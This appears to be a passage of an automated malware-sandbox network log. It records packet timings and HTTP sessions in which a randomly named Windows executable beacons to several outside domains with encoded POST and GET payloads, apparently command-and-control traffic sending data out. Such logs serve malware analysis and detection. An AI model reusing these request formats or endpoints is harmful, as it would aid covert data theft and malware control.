                                                      Jul 9, 2024 12:10:19.714107990 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.714140892 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:20.481473923 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.520001888 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.526151896 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:21.526241064 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.548355103 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.553319931 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168304920 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168358088 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168391943 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168430090 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168425083 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168463945 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168519020 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168581009 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168613911 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168622971 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168648958 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168689013 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168808937 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168839931 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168879986 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.173526049 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173696041 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173728943 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173748970 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.173789978 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173846960 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.260926008 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.261020899 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.261055946 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.261101961 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.261132002 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.272260904 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.277460098 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:27.334606886 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:27.340337992 CEST80497485.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:27.340410948 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:27.367615938 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:27.374743938 CEST80497485.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:28.874370098 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:28.881211042 CEST80497485.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:28.882991076 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.908077955 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.915134907 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:29.915209055 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.937726974 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.944271088 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:30.593400955 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:30.593626976 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:30.593746901 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:31.451064110 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.490400076 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.495590925 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:32.498229027 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.518081903 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.523199081 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:32.523268938 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:34.028971910 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:34.035145998 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:34.035226107 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.065681934 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.071759939 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.074219942 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.094050884 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.099239111 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.748955965 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.749372959 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.749447107 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.759077072 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.766077042 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:40.808561087 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:40.814110041 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:40.814193964 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:40.838975906 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:40.844046116 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:41.589036942 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:41.589447975 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:41.589565039 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:42.361524105 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.395874023 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.401180983 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:43.401314974 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.430684090 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.435786009 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:44.154918909 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:44.154987097 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:44.155206919 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:44.935451031 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.058335066 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.063400984 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.063554049 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.092117071 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.097160101 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.097176075 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.793827057 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.795486927 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.795557022 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:47.608069897 CEST4975480192.168.2.9142.250.185.147
                                                      Session ID: 0; Source IP: 192.168.2.9; Source Port: 49715; Destination IP: 142.250.185.211; Destination Port: 80; PID: 5488; Process: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp: Jul 9, 2024 12:08:11.644896984 CEST; Bytes transferred: 563; Direction: OUT; Data:
                                                      GET /5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.u9games.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Timestamp: Jul 9, 2024 12:08:12.352881908 CEST; Bytes transferred: 540; Direction: IN; Data:
                                                      HTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:08:12 GMT
                                                      Location: https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw%3D%3D
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session ID: 1; Source IP: 192.168.2.9; Source Port: 49716; Destination IP: 103.42.108.46; Destination Port: 80; PID: 5488; Process: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp: Jul 9, 2024 12:08:32.822232962 CEST; Bytes transferred: 844; Direction: OUT; Data:
                                                      POST /la5g/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dtalengineering.com
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dtalengineering.com
                                                      Referer: http://www.dtalengineering.com/la5g/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=4Nn157qKjsX4xk9+SrSusEVtoBT1jBQrGj8EQYSfVg3agyvlCOpci1wxErtVawUn5X0cqbq9HZxw/tFSoYtIsCgdNs5OfI/Pl+B0AFuNy3rZndkREkBH2UQIYxxt8S/vCejkDufyT6XauZiAsgpuWpP1mKh6A0lGO4XtOP2x7G4xY8YzpQ0bzZ9KpBSO
                                                      Timestamp: Jul 9, 2024 12:08:33.693687916 CEST; Bytes transferred: 170; Direction: IN; Data:
                                                      HTTP/1.1 405 Method Not Allowed
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Tue, 09 Jul 2024 10:08:33 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                      Data Ascii: Method Not Allowed


                                                      Session ID: 2; Source IP: 192.168.2.9; Source Port: 49717; Destination IP: 103.42.108.46; Destination Port: 80; PID: 5488; Process: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp: Jul 9, 2024 12:08:35.398618937 CEST; Bytes transferred: 868; Direction: OUT; Data:
                                                      POST /la5g/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dtalengineering.com
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dtalengineering.com
                                                      Referer: http://www.dtalengineering.com/la5g/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=4Nn157qKjsX4wFt+UMmu7UVumhT14RQvGjwEQdqPVSjagTflDLdcj1wxMLtcVQUg5XIlqaW9HYRw/vdSovxXtSgfFM5MRo/Pl+B0AF7Yy3jZntURFAVEpkQLIhxtti/rCejNDrHIT4/aucOA9RptcpPv76gaIm0SBpHDD+SL5VAYbd4t4i9AmO9tumbmoF4O4vW+5uYsqM7KeGDp7Q==
                                                      Jul 9, 2024 12:08:36.267995119 CEST | 170 | IN | HTTP/1.1 405 Method Not Allowed
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Tue, 09 Jul 2024 10:08:36 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                      Data Ascii: Method Not Allowed


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.9 | 49718 | 103.42.108.46 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:08:37.977267981 CEST | 1881 | OUT | POST /la5g/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dtalengineering.com
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dtalengineering.com
                                                      Referer: http://www.dtalengineering.com/la5g/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:38.824285984 CEST | 170 | IN | HTTP/1.1 405 Method Not Allowed
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Tue, 09 Jul 2024 10:08:38 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                      Data Ascii: Method Not Allowed


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.9 | 49719 | 103.42.108.46 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:08:40.543473959 CEST | 571 | OUT | GET /la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.dtalengineering.com
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:41.443200111 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Cache-Control: no-cache, private
                                                      Content-Type: text/html; charset=UTF-8
                                                      Date: Tue, 09 Jul 2024 10:08:41 GMT
                                                      Connection: close
                                                      Transfer-Encoding: chunked
                                                      Data Ascii: 8000<!DOCTYPE html> <html lang=en-AU><head><link rel="icon" type="image/x-icon" href="https://ventraip.com.au/favicon.ico"><link rel="stylesheet" href="//static.synergywholesale.com/manage/style.css?v=563" type="text/css"><link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"><script type="text/javascript" src="/inc/js/components/jquery-3.5.1.min.js"></script><script type="text/javascript" src="/inc/js/components/client.js"></script><link rel="stylesheet" href="/inc/js/components/Aristo.css" type="text/css" /><script type="text/javascript" src="/inc/js/components/jquery-ui.min.js?v=2"></script><link rel="stylesheet" href="/inc/js/components/fancybox.min.css" type="text/css" /><link rel="stylesheet" href="/inc/style/scss/timepicker.css"><link rel="stylesheet" href="/inc/js/components/chosen.css"><script type="text/javascript" src="/inc/js/components/polyfill.min.js"></script><script type="text/jav [TRUNCATED]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.9 | 49720 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:08:47.740792990 CEST | 835 | OUT | POST /mnr7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.alphacentura.com
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.alphacentura.com
                                                      Referer: http://www.alphacentura.com/mnr7/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=kt7eE1sXa7IWaIoh4rXr1dat+xrpQ2bAE6rlkqcWy4CAmMjKrTGNqUXjAaTvPtrdG88DcE7BA4c56o0w4E39rMCNX/h8Vr1p8gZIMP+CR2eNOSCAYJbZPnJGbsvJBZqN9wCC0fcFpXou0F23RyShsJ+5CGm7N3+invbCyx3TrKYJENkqs6kcJ8tf9XyS
                                                      Jul 9, 2024 12:08:48.320627928 CEST | 811 | IN | HTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:48 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyyDm%2Fq7b1OcO09w%2B76Ik0K1rX2Tw3HJ0hhbCvjpta8iF5sbbaPhMiGi6Pxfv4ferChbSGxnznRIZZ51Wp53oIEkg%2FaZvdK%2BdPyzpMUVrXPr3%2FLdc54ptQkAGp%2FSUyC%2BN4NUrIyR6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783cccd50c32d-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.9 | 49721 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:08:50.338512897 CEST | 859 | OUT | POST /mnr7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.alphacentura.com
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.alphacentura.com
                                                      Referer: http://www.alphacentura.com/mnr7/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=kt7eE1sXa7IWYoYh0qXrw9auxRrpHmbME6nlkv9LyrqAmsTKqXyNpUXjYqTuLtrGG85+cBbBA5456pow42f6tcCLCPh+Rr1p8gZIMPrKR2GNOiyAJYbaGHJFRMvJXpqJ9wCw0eArpSsu0Eq3RjSimJ/8Nmn7NybOqef3yAff45UVOME09ItHcrt46w76yswEjR+lVZcXqyvETkvVWQ==
                                                      Jul 9, 2024 12:08:50.914962053 CEST | 806 | IN | HTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:50 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7El2%2F07GBhFCrntaL3xv%2BS2o0ImHq0tvq68Tv%2FVj0Kz3PKRfGBaOd1q5w%2FjP0%2BpdhwgN1PTO%2FnmL6R%2BGkHfV6rIFhfAnJq4zJ57gTGZeJraLy7BhVzlrsWeAzTNb46ehhMKWi0o0zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783dceeb819d7-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.9 | 49722 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:08:52.935950041 CEST | 1872 | OUT | POST /mnr7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.alphacentura.com
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.alphacentura.com
                                                      Referer: http://www.alphacentura.com/mnr7/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:53.522047997 CEST | 799 | IN | HTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:53 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8XFFI6yzM4wCZwfubeM2HSN1Fa9ywJbd8y4UYv7bfvm7p3AZsowbE3weRDNm80qXIXWJO4MjppU4hpIgH5bL2HBYzOvQ4sXigez50MlzDQ7jv%2BZZYibytAejbTLdYqaNI9nzXoCVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783ed3aae41f5-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.9 | 49723 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:08:55.539602041 CEST | 568 | OUT | GET /mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.alphacentura.com
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:56.068378925 CEST | 907 | IN | HTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:56 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7USX5nNn0nMOTM1XSRPfVuCAgnVTNHIQwXTN4cqFS%2FUt4q3n6mki0HutSv%2FZlAjdlhig4HSd%2FLOdrSroDziyecfvhS0Jua5GYvdRSaaYxFeYOLkwh9Ns6%2FcF71R3WKZfeAZptWQTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783fd893b42ad-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Ascii: 11a<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg==&btwaf=62378141"; </script>10


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.9 | 49724 | 134.122.138.60 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:02.725888014 CEST | 835 | OUT | POST /emnz/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
